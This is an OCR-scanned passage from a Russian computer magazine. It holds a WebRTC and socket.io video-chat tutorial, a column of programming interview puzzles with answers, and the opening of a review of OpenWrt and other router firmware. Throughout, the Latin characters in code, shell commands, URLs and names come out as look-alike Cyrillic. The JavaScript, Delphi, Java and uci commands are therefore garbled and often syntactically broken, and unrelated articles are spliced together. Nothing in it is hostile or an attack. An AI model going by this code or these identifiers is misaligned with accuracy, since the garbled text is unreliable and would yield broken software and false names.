наилучший г{с5766-тит-зегуег (соде.доое.сот/р/с5766-игп-зегмуег). Под него есть даже го- 
товый образ для Атагоп ЕС2. 

С ТИВМ пока не все так хорошо, как хотелось бы, но идет активная разработка, и, хочется 
надеяться, через какое-то время \\Меб ВТС если не сравняется со Куре по качеству прохождения 
через трансляцию адресов (МАТ) и сетевые экраны, то по крайней мере заметно приблизится. 


а!СЕ-кандидаты — возможные варианты подключения к данному участнику. 'ОЕРегТоВесе1\уе\/14ео' : *гие } 


Зе 


ФОРМИРОВАНИЕАМ$ МЕВ $ОРИ ОБМЕН1СЕ-КАНДИДАТАМИ 


И ОНег ОР и каждого из 1СЕ-кандидатов необходимо передать другой стороне и там по- 
сле их получения у НТСРеегСоппесйоп вызвать методы зеРетофе,езсирйоп для ОНег 
ЗОР и аад4сеСапачае для каждого 1СЕ-кандидата, полученного от дальней стороны; 
аналогично в обратную сторону для Апз\мег ЗОР и удаленных |[СЕ-кандидатов. Сам Апзмег 
ЗОР формируется аналогично ОНег; разница в том, что вызывается не метод сгежеОНег, 
а метод сгежмеАптзмег и перед этим АТСРеегСоппесНоп методом зеаРетсфеВезсирНоп 
передается ОНег ЗОР, полученный от вызывающей стороны. 
Добавим еще один видеоэлемент в НТМГ: 


<у1аео 14= гео тоео2” ачфор1ау=егие></у1аео> 


и глобальную переменную для второго АТСРеегСоппеснНоп под объявлением первой: 


уаг рс2; 


Обработка ОЧеги Апзмег $ОР 

Формирование Апзмег ЗОР очень похоже на ОНег. В саШБаск-функции, вызываемой 
при успешном формировании Апз\мег, аналогично ОНег, отдадим локальное описание 
и передадим полученный Апзмег ЗОР первому участнику: 


ФипсЕтоп рс2_сгеажеАпмег_зиссе$$ (4езс) { 
рс2. зе ЁГоса1Безсг1ре1оп(ае$с); 
сопзо1е. 108 ("рс2_сгеа еАпзмег_зиссе$$()", аезс.зар); 
рс1 . зе Кето*ебезсг1рЕ1оп(ае$с); 


} 


СаИБаск-функция, вызываемая в случае ошибки при формировании Апз\мег, полно- 
стью аналогична ОКег: 


РипсЕтой рс2_сгеаеАпмег_еггог(еггог) { 
сопзо]1е.102(‘рс2_сгеаЕедпзмег_еггог():', егпог); 


} 


Параметры для формирования Апз\мег ОР: 


уаг апзмегСоп${га1п{$ = { 
'тапЧафогу": { 'О+ЁРегТовесетуедиа1о' : гие, 


При получении ОНег вторым участником создадим 
АТСРеегСоппесйоп и сформируем Апз\мег аналогично ОНег: 


ФипсЕ1оп рс2_гесезуедО+{Рег (аезс) { 
сопзо1е. 105( "рс2_геселуе0+Рег()", 4е$с); 


// Создаем объект ВТСРеегСоппесЕ1оп для второго 
//участника аналогично первому 
рс2 = пем мебк1ЕКТСРеегСоппес*1оп ( зегуег$); 


// Задаем обработчик события при появлении 


//_ТСЕ-кандидата 


рс2.оп1сесапЧ1Ааее = рс2_оп1сесапа19да*е; 


// При появлении потока подключим его 
// к НТМЕ <утаео>» 
рс2.опа4а$+геат = рс_опа@9${геат; 


// Передадим локальный медиапоток (в нашем 
// примере у второго участника он тот же, 
// что и у первого) 

рс2.. ааа геат(1оса15геат); 


// Теперь, когда второй КТСРеегСоппесЕ1оп готов, 
// передадим ему полученный О++ег $0Р (первому 
// мы передавали локальный поток) 

рс2. зе Ветофебезсг1рЕ1оп(_пем 
ВТС$е$$1оп)езсг1рЕ1оп (4е$5с)); 


//_Запросим у второго соединения формирование 
//_ данных для сообщения Апзмег 
рс2. сгеаеАпзмег ( 
рс2_сгеаеАпмег_5иссе$$, 
рс2_сгеаеАп$мег_еггог, 
апмегСоп${га1п$ 


р 
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ТРАНСЛЯЦИЯ ЭКРАНА 


Функцией де!зегМеЧ!а можно также захватить экран и транслировать 
как МеЧ!агеат, указав следующие параметры: 


\1аео: { 
тапдафогу: { спгомеМмед1а$оигсе: 1 }, 
ор*1опа1: [] 

}}; 


Для успешного доступа к экрану должно выполняться несколько ус- 
ловий: 
. включить флаг снимка экрана в че ШзегМесд!а() в спготе:// 

Над5/,спготе://Над$/; 

исходный файл должен быть загружен по НТТР$ (ЗЕ опат); 

аудиопоток не должен запрашиваться; 

не должно выполняться несколько запросов в одной закладке брау- 

зера. 


БИБЛИОТЕКИ ДЛЯ \/ЕВВТС 


Хотя \Меб АТС еще и не закончен, уже появилось несколько базирующихся 
на нем библиотек. /$Р (]551р.пет) предназначена для создания браузер- 
ных софтфонов, работающих с ЗР-коммутаторами, такими как АЗей$к и 
Сата!ю. Реег/$ (рее!$.сот) упростит создание Р2Р-сетей для обмена 
данными, а НоПа (ммеагегаста!.сот/по!а) сократит объем разработки, не- 
обходимый для Р2Р-связи из браузеров. 


Для того чтобы в рамках нашего примера передать ОНег ЗОР от перво- 
го участника ко второму, раскомментируем в функции рс1_сгемеОНег_ 
зиссе$$() строку вызова: 


рс2_гесе1уедО+ Рег (4езс); 


Чтобы реализовать обработку 1СЕ-кандидатов, раскомментируем в об- 
работчике события готовности 1СЕ-кандидатов первого участника рс1_ 
оптсесапаате() его передачу второму: 


рс2.адаТсеСапа1 дате (пем 
ВТСТсеСапа1Аа*е (еуеп* .сап@1да*е)); 


Обработчик события готовности |СЕ-кандидатов второго участника зер- 
кально подобен первому: 


ФРипсЕ той рс2_оп1сесапа1Аа*е (емеп* 
1+ (еуепе.сапа1ааее) { 
сопзо1е.108("рс2_оп1сесапа1ааее():", 
е\уеп* . сап@1да*е .сапа1Аа*е); 
рс1 .аа9ТсеСапа1Аа*е (пел КТСТсеСапа1Аа*е (еуеп* .сапд14ае)); 


} 


ь 


СаИЮаск-функция для добавления медиапотока от первого участника: 


ФипсЕтой рс2_опааа$геат(емепт®) { 
сопзо]1е.105("рс_опаа$геат()"); 
гето*е\/14ео2.5згс = УВЕ. сгеа*еОБз ес УВЕ (емеп* . ${геам) ; 


} 


Завершение соединения 
Добавим еще одну кнопку в НТМЁ 


<БиЕфоп 149="Б{пНапвир" опс11сК="БЕпНапвирС11сКк(_)">Напя Ур 
</Биоп> 


и функцию для завершения соединения 


ФипсЕтой Б%пНапгирс11ск() { 
// Отключаем локальное видео от НТМЁЕ-элементов <\14ео>, 
// останавливаем локальный медиапоток, устанавливаем = пи11 
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1оса1\/14ео1.5ъгс = ; 1оса15геат.$Фор(); 1оса15%геат = пи11; 
// Для каждого из участников отключаем видео от НТМЕ- 

// элементов <\14ео>, закрываем соединение, устанавливаем 

// указатель = пиу11 
гетое\/1аео1 .5гс = 
гетое\/1аео2.5гс = 


ПТ - 
пи11; 


рс1.с105е(); рс1 
ИИС 2. С105е();КрЕ2 


Сохраним как исе${3.Нит1, выложим на сервер и откроем в браузере. 
В этом примере реализована двусторонняя передача медиапотоков между 
двумя ВАТСРеегСоппесНоп в рамках одной закладки браузера. Чтобы ор- 
ганизовать через сеть обмен ОНег и Апзмег ЗОР, 1СЕ-кандидатами между 
участниками и другой информацией, потребуется вместо прямого вызова 
процедур реализовать обмен между участниками с помощью какого-либо 
транспорта, в нашем случае — веб-сокетов. 


Моае.]5 и зоске{.1о 

Для того чтобы организовать обмен $ЗОР и 1СЕ-кандидатами между двумя 
АТСРеегСоппесйоп через сеть, используем Моае.]$ с модулем зоске.о. 
Установка последней стабильной версии Моче.]5 (для Веап/УБити) опи- 


сана здесь: ои.[у/Ласий 


$ зи4о аре-веЕ 1п$$а11 руЕКоп-5о0+Емаге-ргорег1ез ру{Поп 
5++ таке 
$ зидо ааа-ар*-геро$1%огу рра:сИг1$-1еа/поде. $ 


$ зи4о ар*-веЕ ирда*е 
$ зидо арЕ-вее 1п5%а11 по4е}5 


Установка под другие операционные системы описана здесь: Би.1у/ 
еа и. Проверим: 


$ еспо "зу$=геаи1ге( 'и{11'); зу5.риф$('ТезЕ тез5аве');" > 
подете${1. 1$ 
$ поде]з поде*е$+1. 1 


С помощью прт (Моде Раскаде Мападег) установим зоскеЕ{.1о и дополни- 
тельный модуль ехрге5з: 


$ прт 1п5$а11 зосКке*.1о ехрге$$ 


Проверим, создав файл под@ще${2.|5 для серверной части: 


$ папо поде*фе${2.35 
уаг арр = геди1ге(‘ехогез$’)() 
‚ зегуег = геади1ге( о ).сгеае$егуег(арр) 
‚ 10 = геди1ге(‘ соскее.1о').115$%еп(зегуег); 
зегуег. 11$еп (30); // Если порт 8@ свободен 


// При обращении к корневой странице 
арр.се*(‘/’ ФипсЕ топ (геа, гез) { 
// отдадим НТМЕ-файл 
гез .зепаЯТе (___41гпате + '/подефе${2 .Ит1'); 
}); 
И Во О 


10.5осКеЕ$.оп(' соппес1оп', ФипсЕТоп (зоскее) { 
// отправим сообщение 
зоскее.ет1*(‘сегуег еуепе', { Ие11о0: 'мог1а' }); 
//_и объявим обработчик события при поступлении сообщения 
//_от клиента 
$оскее.оп(‘'с11епЕ емепе', Фипс1оп (4афа) { 
соп5о1е. 108 (ата); 


р 
Пе 


И подще$12. Пт! для клиентской части: 


$ папо подефе${2 .п&т1 
<$СГ1ре згс=" /зоскеф.10/ъосКкеф.10.]5"></5сг1ре> 
<5сг1ре> 
// УВЕ сервера веб-сокетов (корневая страница сервера, 
//_<с которого была загружена страница) 
маг зоскеЕ = 1о.соппесе(‘/‘); 


зоскее.оп('зегуег емепе', Фипс Топ (4афа) { 
соп5о1е.1о8(4афа); 
зоскее.ет1*(‘'с11епЕ еуепе', { ‘пате': ‘уа1ие’ }); 
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р 


</5сг1ре> 


Запустим сервер: 


$ зидо поде]з подефе${2. 15 


и откроем страницу ПЁр://\юоса!о${:80 (если запущен локально на 80-м пор- 
ту) в браузере. Если все успешно, в консоли ЧауаЗ спирт браузера мы увидим 
обмен событиями между браузером и сервером при подключении. 


ОБМЕН ИНФОРМАЦИЕЙ МЕЖДУВТСРЕЕРСОММЕСТ!ОМ ЧЕРЕЗ 
ВЕБ-СОКЕТЫ 


Клиентская часть 
Сохраним наш основной пример (Цсаето3.1и!) под новым именем 


Нсаето4.п1т1. Подключим в элементе <Пеаа> библиотеку зоскЕ.1о: 


<5СГ1ре згс=" /зоскеф.10/ъоскет.10.]$" ></5сг1ре> 


И вначале сценария уауа$ спирт — подключение к веб-сокетам: 


уа" зоскее = 10.соппесе(‘' ПЕЕр: //1оса1по$*'); 


Заменим прямой вызов функций другого участника отправкой ему со- 
общения через веб-сокеты: 


ФипсЕ1оп сгеажео+ег_зиссе$$ (4езс) { 


//_ рс2_гесе1уед0++ег (4езс); 
оскее .ет1е(‘оРРег', 4е$с); 


1 


ФипсЕтой рс2_сгеаеАпзмег_зиссез$ (4езс) { 


// _рс1. зе Кетоерез$сг1рЕ1оп (ае$с); 
5оске*.ет1{( 1’, аежс ); 


} 


ФипсЕ1оп рс1_оп1сесапа1аа*е(еуепт®) { 


// рс2.аааТсеСапа1аа*е (пем ВТСТсеСапа1аа*е 
// (емеп*.сапа1аа*е)); 
5оске*.ет1{(_, емепЕ. сапа1аа*е); 


} 


РипсЕтой рс2_оп1сесапа14а{е (емеп®) { 


//_рс1.аааТсеСапа1аа*е (пем ВТСТсеСапд1аа*е 
// (емеп*.сапа1аа*е)); 
5оске*.ет1{( ‹_ , еуепЕ. сапа1аа*е); 


В функции Папдир() вместо прямого вызова функций второго участника 
передадим сообщение через веб-сокеты: 


ФипсЕтой Б%пНапёирСс11ск() { 


//_гетофе\1аео2. гс = Ире СПЕ рее: 
зоскее .ет1(‘'Папгир', {}); 


} 


И добавим обработчики получения сообщения: 


5оскеф.оп(‘оГтег’, фипс1оп (аа 
соп501е,105("соске*.оп('оРег'):", аажа); 
рс2_гесе1уед О ег (ааа); 
В 
5оскее.оп(‘эпзиег’, ФипсЕ1оп (4аЖа) {е 
сопзо]1е. 108 ("зосКкеф.оп('апзмег'):", аа*а); 
рс1 . зе Кето*ебезсг1рЕ1оп( пем ВТС5$е5$1оп)езсг1р*Топ( дафа)); 
ВЕ 
$оскее.оп(‘1се1'’, фипс1оп (да*а) { 
сопзо1е.105("зоскее.оп('1се1'):", ааЖа); 
рс2 . аааТсеСапа1Аате (пем ВТСТсеСапа1Аате (4афа)); 


}; 


<оскее.оп('1се2', фипсЕ1оп (даа) { 
сопзо1е.108("зоскее.оп('1се2'):", адажа); 
рс1 . аа4ТсеСапа1Аа*е (пел ВТСТсеСапа1Аате (дафа)); 
НЫ: 
$оскее.оп(‘паприр’ _Фипс1опт (4ажа) { 
сопзо1е. 108("зоскее.оп('Папвир'):", аафа); 
гето{е\/14ео2.$гс = "”; рс2.с10$е(); рс2 = пи11; 


у; 


Серверная часть 

На серверной стороне сохраним файл подще$+2.]5 под новым именем 
це. и внутри функции 10.50скКщ$.оп(‘соппесйоп', Типсйоп ($0ске1) {... 
} добавим прием и отправку сообщений клиентов: 


// При получении сообщения 'о+ег', так как клиентское 
// соединение в данном примере всего одно, 
// отправим сообщение обратно через тот же сокет 
5оскее.оп(‘оттег’, ФипсЕ Топ (4ажа) { 
5оске*.ет1*( о’, адажа); 
// Если бы было необходимо переслать сообщение по всем 
// соединениям, кроме отправителя: 
// зоке*.Бгоаса$*.ет1*('оРРег', аафа); 
ЧЫ 
5оскее.оп(‘апзиег’, ФипсЕ1оп (даЖа) { 
5оске*.ет1*( о’, ааЖа); 
и ЗА СВАЕ ИА РР чЕЕЕ. 
5оскее.оп(‘1се1’, ФипсЕ1оп (4афа) { 
5оске*.ет1*( ‘о, дажа); 
}); 
$оскее.оп(‘1се2‘, ФипсЕ1оп (4афа) { 
5оске*.ет1*( ‹_ , дажа); 
Ле: 
<оскее.оп('Паприр', Фипс1оп (4афа) { 
5оске*.ет1*( о’, ааЖа); 


}); 


Кроме этого, изменим имя НТМ!-файла возвращаемого при обращении 
к корневому каталогу: 


ге$.зепаЯ1е 1гпате + '/подефе${2.пЕт1'); 
ге$ .сепаЯТе (___41гпате + '/гЕсее$Е4. 11 '); 


Запуск сервера: 


$ зидо поде]з гЕс%е$*4. 5 


Несмотря на то что код обоих клиентов выполняется в пределах одной 
и той же закладки браузера, все взаимодействие между участниками в на- 
шем примере полностью осуществляется через сеть и «разнести» участни- 
ков уже не составит особой сложности. Впрочем, то, что мы делали, тоже 
было очень простым — эти технологии и хороши своей простотой в ис- 
пользовании. Пусть иногда и обманчивой. В частности, не будем забывать, 
что без ЗТУМ/ТУАМ-серверов наш пример не сможет работать в присут- 
ствии трансляции адресов и сетевых экранов. 


ЗАКЛЮЧЕНИЕ 
Получившийся пример очень условен, но если немного универсализи- 
ровать обработчики событий, чтобы они не различались у вызывающей 
и вызываемой стороны, вместо двух объектов рс1 и рс2 сделать массив 
АТСРеегСоппесНоп и реализовать динамическое создание и удаление 
элементов <маео>, то получится вполне пригодный для использования ви- 
деочат. В этом уже нет особой специфики, связанной с \Меб РТС, и пример 
простейшего видеочата на несколько участников (как и тексты всех при- 
меров статьи) есть на диске, идущем с журналом. Впрочем, и в интернете 
можно найти уже немало хороших примеров. В частности, при подготовке 
статьи использовались: эзитр!ипо де зегМед!а (ви Лу/УчрВу), зипр!ийто 
АТСРеегСоппесйоп (51.1у/18а11 0%), \МеБАТС Ветегепсе Арр (БИ.1у/\АЛЬОСА). 
Можно предположить, что совсем скоро благодаря \М\еб АТС произойдет 
переворот не только в нашем представлении о голосовой и видеосвязи, 
но и втом, какмы воспринимаем интернет в целом. \Меб ВТС позиционирует- 
ся не только как технология для звонков из браузера в браузер, но и кактех- 
нология коммуникаций реального времени. Видеосвязь, которую мы разо- 
брали, лишь небольшая часть возможных вариантов его использования. 
Уже есть примеры трансляции экрана (скриншаринга) (Б(.1у/16хещ\М/), и со- 
вместной работы (6И.1у//ауахВ), и даже Р2Р-сеть доставки контента на ос- 
нове браузеров (ВИрз://реегсап.сот) с помощью АТСВааСвпаппае!. 2 
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ЗАДАЧИ НА 
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Александр Лозовский 
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РЕШЕНИЕ ЗАДАЧ ОТ КОМПАНИИ ЕМВАВСАВЕВО ИЗ ПРОШЛОГО НОМЕРА 


Победитель пока не определился, поэтому лови 
половину решений задач из прошлого номе- 
ра. Оставшуюся половину решений мы выкатим 
в следующем номере или на нашем сайте, вместе 
с чествованием победителя, который получит ли- 
цензию на РАБ З{иаю ХЕ4. стоимостью более 100 
килорублей. Вообще офигеть: задачки простые, 
в подарок — лицензия на отличную среду разра- 
ботки в Верт, С++ Вийаег и ЕтеМопкеу с прямой 
разработкой приложений для 105, а полноценных 
решений от читателей все еще нет! Если так даль- 
ше пойдет, я сам пришлю решения в Етбагсааего 
с фейкового мыла :). Только тсс! 


ЗАДАЧА 1 
Дан код, срабатывающий при нажатии на кнопку: 


ргоседиге ТЕогм1 .Виоп1С11сК+«= 
(бепаег: ТОБдес*); 
Беё1п 
гу 
ку 
5ЕгТоТпЕ ( 'зоте питбег'); 
5ПомМезза8е("1'); 
ехсер* 
°ПомМез5аве("2'); 
епа; 
бпа11у 
°помМез5аве('3'); 
епа; 
°помМе$5аре ('4'); 
епа; 


Какие цифры увидит пользователь программы? 


Ответ: цифры 2, 3, 4. Цифра 1 не отобразится, так 
как строчкой выше возникнет исключение. Цифра 
2 появится — сработает ехсери. 

Строка в блоке НпаЙу выполняется всегда. 
Цифра 4 тоже появится, поскольку исключение 
уже обработано. 


ЗАДАЧА 2 
Дан код: 


А = с1а$5$ 
риб11с 
ргоседиге Еип; 
епа; 


В = с1а5$(А) 
ручб11с 
ргоседиге Еип; 
епа; 


ргоседиге А.Рип; 
Беё1п 

°ПомМе$5аре('А'); 
епа; 


ргоседиге В.Рип; 
Беё1п 

5ПоиМез5азе(‘'В' 
епа; 


аа 

уаг 
геёдА : А; 
геЕв : В; 

Беё1п 
геРА := В.Сгеа*е; 
геЕВ := гефА; 
геёА.ЕРип; 


геёВ.Еип; 


ыы 


епа; 


В какой строчке кода будет ошибка компиля- 
ции? Каким способом (способами) можно ее 
исправить? 

В случае исправления и успешного запуска ка- 
кие буквы увидит пользователь? 

Какие изменения нужно внести в код классов, 
чтобы пользователь увидел два раза букву В? 


Ответ: ошибка компиляции будет в строке ге?В := 
ге!тА. Исправить можно так: ге!В := геТА а$ В или 
ге!В := В(А). 

Первый способ предпочтительнее, так как вы- 
полнится проверка на наследование классов 
В = са$$5(А). После исправления пользователь 
увидит А и затем В. 

Чтобы были отображены два раза буквы 
В, нужно добавить у\иа к описанию мето- 
да ргоседиге Гип в классе А и оуетае к методу 
ргоседиге В в классе В. 


ЗАДАЧА З 
Дан код: 


ТМуТпегРасе = 1п{егФасе 
епа; 


ТМуС1а$5 = с1а$$ (ТТпиегРасед06 ес, «= 
ТМуТпеег+асе) 
рчб11с 
е+гисфог ОБе${гоу; 
епа; 


дез&гисфог ТМуС1а$5.Оез*гоу; 
Беё1п 
°ПомМез5авре ( 'ае5{гисфог'); 


еп; 
ргоседиге ТЕогт1 .Виоп1С11сК+= 
(Зепаег: ТОБдес®); 


маг 
11+ : ТМутпжег+асе; 
Беё1п 
11+ := ТМуС1а$$ .Сгеа*е; 
епа; 


Что нужно изменить в коде, чтобы при нажа- 
тии на кнопку пользователь увидел сообщение 
со словом «аегистог»? 


Ответ: нужно добавить слово «омегиае» к описа- 
нию деструктора в классе. При работе с объектом 
через интерфейсную ссылку объект удалится ав- 
томатически, писать Егее не надо! 


ЗАДАЧА 4 
Пусть на «форме» размещен компонент ТТаЫе. 
Какие строчки кода не будут компилироваться? 
Таые1.НезчвВуМате(“а') Маше := 10; 
Та е1.НезчвВуМате(“та'). Маше := Чеп'; 
Таые1.НезчвВуМате(“а').Азитедег := 10; 
Тае1.Ре!$[0].АзЗ{ита := 10; 
ТаБе1 [1а'] := 10; 
Таые1 ["а'] := Чет"; 
Тае1.Незз$[“а'] := Чеп"; 
ТаБе1.Незаз$[“а!] := 10; 
ТаБе1.Нез$.НеаВуМате(“а').АзЗ{ипоа := 10; 
. Тае1.НеазВу!а(“а') Маше := 10; 
. Тае1.Неа$.РеаВуМате(“а").Азщесдег := 10; 


о 


_—_ юо 
о. . 


Ответ: будут компилироваться строки 1, 2, 3, 5, 6, 
11. Другие строки компилятор не пропустит: 4, 7, 
Ви 9 — «несовместимость типов», 10 — «незаде- 
кларированный идентификатор». 
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Миссия этой мини-рубрики — образовательная, поэтому мы бесплатно публикуем качественные 
задачки, которые различные компании предлагают соискателям. Вы шлете задачки на |07о\зКу@® 


9!с.ги — мы их публикуем. Никаких актов, договоров, экспертиз и отчетностей. Читателям — за- 
дачки, решателям — подарки, вам — респект от нашей многосоттысячной аудитории, пиарщи- 
кам — строчки отчетности по публикациям в топовом компьютерном журнале. 


ДЛЯ ЖЕЛАЮЩИХ РАЗМЯТЬ МОЗГИ — НОВАЯ ПАРТИЯ ЗАДАЧЕК 


ЗАДАЧИ ОТКОМПАНИИ 
«КОД БЕЗОПАСНОСТИ» 


Первая задача 

Почему в первом выражении необходимо указы- 
вать параметры шаблонного типа в явном виде, 
а во втором выражении этого не требуется? 


5Е4: : тарх1п*, 1п>туМар; 

// Выражение 1 

мУМар .1п5ег* ($4: : ра1г<1ие, «= 
11Е>(10, 20)); 
// Выражение 2 _ —_ А. 
муМар .1п5зег* ($4: : пмакКе_ра1г(30, 40)); 


Вторая задача 
Вызов какого метода М@Поа1(), Мапоа2() при- 
ведеткошибке? 

Приведенный пример не относится к практи- 
кам коммерческого программирования, а служит 
для понимания внутреннего устройства классов. 


с1а$$ СА 

{ 

БЫВТЕС: 

у1гфиа1 =СА() {} 

\о1а МеЕНоа1() { $4: : соч << = 
"Не11о, мог1а?"; } 

\1гЕиа1 уо1а Метйо42() { $4: : сом << «= 
"Не11о, мог1а?"; } 

}; 

СА* рА = МУ; 

рА->Мефпоа1(); 

рА->Мефпоа2(); 


Третья задача 

Каково время жизни объекта класса С\\Мпа, указа- 
тель на который возвращает метод СМ/па::Се 09] 
{ет(ти!ОСопго!)? 


ЗАДАЧИ ОТПТ-КОМПАНИИ С0$Т1$ 
(СУ$Т!$.ВО) 


Задача для системных аналитиков 
Допустим, с точки зрения бухгалтера, счета де- 
лятся на балансовые счета первого порядка, вто- 
рого порядка и лицевые (для краткости БСТ, БС2, 
ЛС). БС1 находятся на верху иерархии, БС2 вкла- 
дываются в них, а ЛС вкладываются в БС2. 


Все счета имеют обязательные атрибуты — 
имя и номер. У БС1 номер имеет длину 3, уБС2 — 
5, УЛС — 20. Имя не превышает 255 символов. 

Со временем счета могут открываться и за- 
крываться. При этом переоткрытый БС1 или 
БС2 — это другая сущность, а вот переоткрытый 
ЛС — это та же сущность, то есть ссылки на этот 
ЛС должны остаться актуальными. Необходимо 
строить корректные отчеты за любую дату. 

Предложите схему (ЕНО) для хранения таких 
данных. 


Задачадля разработчиков РЕ/ЗОЕ 

Нужно передать в процедуру В список номеров 
счетов. Процедура В должна просто перебрать 
все счета и вызвать для каждого процедуру А, ко- 
торая, в свою очередь, просто выводит их через 
абт$_ошШрщ. Предложите варианты реализации 
процедур А и В, напишите код для одного из них. 


Задачадля разработчиков С# 

Выберите верные утверждения относительно 

сборщика мусора (дафадесойестюг) в СЕВ: 

А. Объект собирается сборщиком мусора, толь- 
ко когда на него не остается ссылок. 

В. Два объекта, которые ссылаются друг на дру- 
га, могут быть собраны сборщиком мусора. 

С. Недостатком сборщика мусора является мед- 
ленное выделение памяти для новых объектов. 

О. Объект, на который ссылается статическое 
поле класса, никогда не будет собран. 


Варианты ответов: 


1: Вы 
2. А, О 
3. В, О 


4. А, С, О 

5. А, В, О 

Задача для разработчиков Чауа 

Напишите для каждой строки с комментарием: 

. в каком состоянии находится объект е (пем, 
тападеа, аеааспеч, гетоуед); 
для каких строк кода можно гарантировать 
(для конфигурации по умолчанию), что сразу 
после их выполнения состояние и поля объек- 
та в памяти и в БД синхронизированы. 


риб11с з%а{1с уо1 та1п($%г1п8[]аг5$){ _ 
Еп{1{УуМапазегРас®огует+=Рег$1${епсе. += 
сгеафеЕп{1уМапазегЕас®огу ( "туРИ"); 
Еп{1УМапазегет=емт+ . < 
сгеафеЕп{1{УМапавег(); 
МУЕПЕ1+у е =пемМуЕп1еу();// 1 
ет. ге Тгапзас 1оп().Беё1п(); 
ет.рег$1$5*(е);// 2 
ет. ге Тгапзас1оп().сотт1();// 3 
ет.с105е(); == 
ет=ем+ . сгеакеЕпЕ1ЕуМапаяег();// 4 
е =ет.Впа (МуЕпЕ1у.с1а$$, «= 
е.веет9());// 5 
ет.с105е() ;ет=емтф. «= 
сгеафеЕп{1уМапавег();// 6 
е =ет.тегве(е); // 7 
ет. ге Тгапзас1оп().Беё1п(); 
ет.гетоме (е);// 8 
Гоп> атоипе =(ЁГоп8)ет. сгеа*е0цегу‹ = 
(“зе1есЕ соип(е.1а) гот МУЕпЕ1Уу == 
е").5е%51п21еВези1*();// 9 
ет. ге Тгапзас1оп().сотт1();// 109 
ет.с105е();// 11 


Правильные ответы присылай или мне, или на адрес представителя компании, 
который может быть указан в статье. Поэтому тебе придется не только решить за- 
дачку, но и дочитать статью до конца. Не шутка — две страницы чистого текста! 
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НА ВСЕ РУКИ 


Обзор альтернативных прошивок 
домашних роутеров 


, 


“г 


и 


# 


4 


Возможности стандартных прошивок часто 


не удовлетворяют всем требованиям пользователей. 


Кому-то надо качать торренты, кому-то необходим 
ОЕМА/\о!Р/принт-сервер, а кто-то просто любит 
экспериментировать. Во всех этих случаях можно 
поставить ту или иную прошивку, а если ни одна 
из них не подходит, то и собрать ее самому. 


ВВЕДЕНИЕ 

ЗОНО-роутеры у большинства обычных пользователей, 
как правило, ставятся по принципу «настроил и забыл». Ос- 
новное их предназначение в раздаче интернета для домашней 
сети, однако в отдельных случаях возникает необходимость 
в чем-нибудь более экзотическом, к примеру — в файловом 
сервере. В стандартных прошивках таких возможностей может 
и не быть. Но, поскольку ПО абсолютного большинства совре- 
менных роутеров для домашнего использования (кроме, быть 
может, Ниамет, где используется ОС собственной разработки) 
основано на ядре Шпих, а некоторые фирмы в свое время даже 
открыли часть исходников, не исключено, что для твоего роуте- 
ра существуют и кастомные прошивки, в одной из которых мо- 
жет найтись столь желанная возможность — как знать? А если ый 

даже и не найдется, то при некоторых усилиях ты можешь эту Роман Ярыженко 
возможность добавить самостоятельно. готтапю@уапаех.ги 


На данный момент наиболее популярными прошивками 
считаются следующие: 

® Ореп\ М (ПИоз://орепмит.ога) — пожалуй, самая известная 
из альтернативных прошивок. Возможности ее включают, 
например, ФС с функцией записи (как правило, реализует- 
ся путем создания раздела $2 и использования омейау5 
для объединения со заца$Н5), пакетный менеджер орка 
с репозиторием, в котором более 3000 пакетов, и способ- 
ностью использовать внешний накопитель для увеличения 
свободного пространства в /. При этом основная часть про- 
шивки очень маленькая. Фактически это даже не прошивка, 
а полноценный дистрибутив для роутеров с соответствую- 
ЩИМИ ВОЗМОЖНОСТЯМИ. 

® ОО-МВТ (ул. аЧ-м/т.сот) — тоже достаточно популярная 
прошивка. В отличие от предыдущей, заточена для тех, кто 
не хочет ковыряться в конфигурационных файлах, устанав- 
ливать программы... Разумеется, там есть возможность это 
сделать, но придется столкнуться с некоторыми затрудне- 
ниями. 

® Прошивка от Олега (0!е9.м/15009.шт0). В основном предна- 
значена для роутеров Ази$. Отличается, по мнению некото- 
рых, довольно неплохой поддержкой принтеров и достаточ- 
но странной на первый взгляд системой сохранения файлов 
в прошивке — после каждого изменения файловой системы 
необходимо давать две-три команды. 

е Тотат (ро!агсоцЯ.сот/ЛАотато) предназначена для ро- 
утеров на чипе Вгоаасот. Одно из преимуществ данной 
прошивки — при обновлении сохраняется старая конфи- 
гурация. 
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е ШБгем/АТ (Поге\м.ога) — совершенно свободная про- 
шивка от ЕЗЕ Как водится, отпочковалась от Ореп\\ 
и практически ничем, кроме отсутствия проприетарных 
драйверов, от последней не отличается. Примечательна 
тем, что из-за нее ЕЗЕ немного изменил свои принципы: 
если до этого одним из условий «свободы» была необ- 
ходимость иметь возможность компиляции приложения 
на том же устройстве, на котором оно запускается, то те- 
перь это необязательно. 


Разумеется, в списке упомянуты не все прошивки, но их 
настолько много, что всех и не упомнишь. Дальше я буду рас- 
сматривать роутер ТР-ИМК ТЕ-М/ОА4300 и прошивку Ореп\/, 
как наиболее гибкую. 


УСТАНОВКАИ НАЧАЛЬНАЯ КОНФИГУРАЦИЯ 
ОРЕМ\АТ 

Первым делом необходимо прошить роутер. В моем случае 
В этом не было ничего сложного, главное — выбрать правиль- 
ный вариант прошивки. Для этого необходимо внимательно 
смотреть на название — для обновления со стоковой прошив- 
ки ТР-ИМК я использовал файл орепиг*{-аг71хх-вепег1с-+1- 
иаг4300-\1-5аца$Н+$-Фасфогу.61п. В названии закодированы 
семейство чипсетов (аг/71хх), конфигурация ядра (депепс), на- 
звание и версия аппаратной части роутера, тип ФС и для ка- 
кой именно цели предназначен образ — прошивка с нуля 
(Тастогу) или обновление существующей Ореп\/ (зузирогаае). 
Ни в коем случае не используй узирогаае для установки со сто- 
ковой прошивки — так ты просто превратишь роутер в кирпич. 
И вообще, поскольку для каждого роутера все индивидуально, 
читай внимательно соответствующий сайт. 

Но вот ты прошил роутер и при этом умудрился его не окир- 
пичить. Заходи по Тете (адрес по умолчанию 192.168.1.1) 
и настраивай \М/АМ. У меня он довольно долго не подключался, 
и пришлось разбираться с этим вопросом. Оказалось, что неко- 
торые провайдеры (в частности, ТТК, к которому я подключен), 
кроме проверки по МАС-адресу, требуют еще и совпадения 
с этим МАС-адресом Сйептр. 

В итоге я использовал следующие команды (здесь и да- 
лее в статье, чтобы не путаться, где именно исполнять коман- 
ды — на компе или на роутере, роутер будет обозначаться 
как орепмг{#): 


орепигЕ# 
орепигЕ# 
орепигЕ# 


ис1 зеф пефмогкК.мап .рго®о=айср 
ис1 зе пефмогкК.мап.Бгоадса$*=1 
ис1 5еф пефмогК.мап.тасадаг=+= 
09: аа: ББ : сс: 4 :ее 

ист 5еф пефмогК.мап. с11еп1а= = 
0109 ааббссааее 

орепигЕ# ис1 сотт1е пе{могк 

